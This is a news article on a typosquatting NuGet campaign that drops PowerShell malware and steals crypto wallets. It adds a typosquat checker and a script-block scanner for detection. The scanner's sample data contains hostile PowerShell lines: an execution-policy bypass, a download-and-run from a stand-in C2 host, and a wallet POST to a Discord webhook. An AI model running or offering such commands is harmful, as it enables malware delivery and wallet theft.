Threat actors are running a new cryptocurrency-stealing campaign that uses malicious NuGet packages to compromise .NET developers. The packages masquerade as legitimate ones through typosquatting.
Based on reports, three malicious packages were downloaded more than 150,000 times in under a month. The hackers could have infected thousands of .NET developers while lending their malicious NuGet packages an appearance of legitimacy.
The researchers claimed that numerous users downloaded the top three infectious packages thousands of times, indicating that the cybercriminal operation was highly successful. However, the download tally is not an entirely reliable indicator of the attack's success, since the threat actors could have inflated it with bots to make their packages seem legitimate.
The hackers used typosquatting to name their NuGet packages.
According to the investigation, the package authors used this typosquatting tactic to spoof the account of a legitimate Microsoft developer who works on NuGet, the .NET package manager.
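Typosquatting works because a one-character difference in a package ID is easy to miss in a project file. The following is an added example, not code from the article or from the researchers it cites: it extracts the `PackageReference` IDs from a constructed `.csproj` fragment and flags any ID that is within a small edit distance of a name on a trusted allowlist without matching it exactly. The allowlist, the package names and the version numbers in the sample are assumptions made up for illustration; NuGet IDs are compared case-insensitively, as NuGet itself treats them.

```python
"""Flag look-alike (typosquatted) package IDs in a .NET project file."""
import xml.etree.ElementTree as ET

# Assumed allowlist of package IDs the project is expected to use.
TRUSTED = {
    "Microsoft.Extensions.Logging",
    "Microsoft.Extensions.DependencyInjection",
    "Newtonsoft.Json",
    "Serilog",
}

# Constructed .csproj fragment; the look-alike IDs are invented for illustration.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <ItemGroup>
    <PackageReference Include="Newtonsoft.Json" Version="13.0.3" />
    <PackageReference Include="Newtonsoft.Jsom" Version="1.0.0" />
    <PackageReference Include="Microsoft.Extension.Logging" Version="7.0.0" />
    <PackageReference Include="Serilog" Version="3.0.1" />
    <PackageReference Include="SomeCompany.Widgets" Version="2.1.0" />
  </ItemGroup>
</Project>"""


def levenshtein(a, b):
    """Edit distance between two strings (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete ca
                           cur[j - 1] + 1,         # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def package_names(csproj_xml):
    """Return the Include attribute of every PackageReference element."""
    root = ET.fromstring(csproj_xml)
    return [el.get("Include") for el in root.iter("PackageReference") if el.get("Include")]


def find_lookalikes(names, trusted=TRUSTED, max_distance=2):
    """Return (suspect_id, trusted_id, distance) for IDs that nearly match a trusted one.

    Exact (case-insensitive) matches are legitimate and skipped; only near
    misses within max_distance edits are reported.
    """
    trusted_lower = {t.lower(): t for t in trusted}
    findings = []
    for name in names:
        if name.lower() in trusted_lower:
            continue
        for t_lower, t in trusted_lower.items():
            d = levenshtein(name.lower(), t_lower)
            if d <= max_distance:
                findings.append((name, t, d))
    return findings


if __name__ == "__main__":
    for suspect, trusted_id, dist in find_lookalikes(package_names(SAMPLE_CSPROJ)):
        print(f"SUSPECT {suspect!r} is {dist} edit(s) from trusted {trusted_id!r}")
```

Run against the sample, the audit reports `Newtonsoft.Jsom` and `Microsoft.Extension.Logging` as one edit away from trusted IDs, while `Serilog` (exact match) and `SomeCompany.Widgets` (unrelated) pass. The distance threshold is deliberately low: a larger one catches more, but also produces noise on short IDs.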
Moreover, the malicious packages were designed to download and run a PowerShell-based dropper script that reconfigures the infected device to allow unrestricted PowerShell execution.
The campaign then downloads and deploys a second-stage payload, a Windows executable that is entirely custom. This is an unusual choice, since such attackers usually rely on open-source tools and commodity malware rather than building an independent payload.
Furthermore, the malware deployed on an infected system can act as a crypto stealer, exfiltrating the victims' cryptocurrency wallets through Discord webhooks. The actors could also extend the campaign by running malicious code from Electron archives and by auto-updating the malware through queries to the attacker-controlled C2 server.
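The dropper chain described above leaves traces in PowerShell script-block logging (Event ID 4104): an execution-policy change, a download of an executable followed by its launch, and a POST to a Discord webhook URL. As an added example that is not part of the article or the underlying research, the scanner below runs a few regular-expression rules over constructed script-block text and reports which behaviour each block matches. The sample blocks, the rule names and the `example.invalid` host are assumptions for illustration; a real deployment would feed it the ScriptBlockText field exported from the event log.

```python
"""Classify PowerShell script-block text against the dropper behaviours described above."""
import re

# Constructed sample script blocks; hosts and webhook IDs are placeholders.
SAMPLE_BLOCKS = [
    "Set-ExecutionPolicy Unrestricted -Scope CurrentUser -Force",
    "Invoke-WebRequest -Uri http://c2.example.invalid/stage2.exe -OutFile $env:TEMP\\stage2.exe; "
    "Start-Process $env:TEMP\\stage2.exe",
    "Invoke-RestMethod -Uri https://discord.com/api/webhooks/000000/PLACEHOLDER -Method Post -Body $wallet",
    "Get-ChildItem -Path . -Recurse | Measure-Object",
]

# Each rule: (label, compiled regex). Case-insensitive because PowerShell is.
RULES = [
    # Dropper step: execution policy weakened to Unrestricted or Bypass.
    ("execution-policy-weakened",
     re.compile(r"(Set-ExecutionPolicy|-ExecutionPolicy)\s+(Unrestricted|Bypass)\b", re.I)),
    # Second stage: a download cmdlet or method referencing an .exe in the same block.
    ("download-and-execute",
     re.compile(r"(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|DownloadFile|DownloadString)\b.*\.exe\b", re.I)),
    # Exfiltration channel: Discord webhook endpoint.
    ("discord-webhook-exfil",
     re.compile(r"discord(app)?\.com/api/webhooks/", re.I)),
]


def classify(block):
    """Return the labels of every rule that matches one script block."""
    return [label for label, rx in RULES if rx.search(block)]


def scan(blocks):
    """Return (index, labels) for each block that matched at least one rule."""
    findings = []
    for i, block in enumerate(blocks):
        labels = classify(block)
        if labels:
            findings.append((i, labels))
    return findings


if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_BLOCKS):
        print(f"block {idx}: {', '.join(labels)}")
```

Any single hit is worth a look, but the combination of all three labels on one host within a short window is the pattern that distinguishes this dropper chain from an administrator's routine policy change. Note that the download rule only fires when the download and the `.exe` reference share a script block; a dropper that splits them across blocks needs correlation by process ID, which this example does not do.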
Payloads spread in this operation have a meagre detection rate, and the built-in Windows anti-malware did not flag these tools. Relying solely on the anti-malware component built into Windows is therefore insufficient to detect such threats.
Such repository attacks have been prevalent for the past few months, so developers should be more cautious when acquiring packages from public repositories.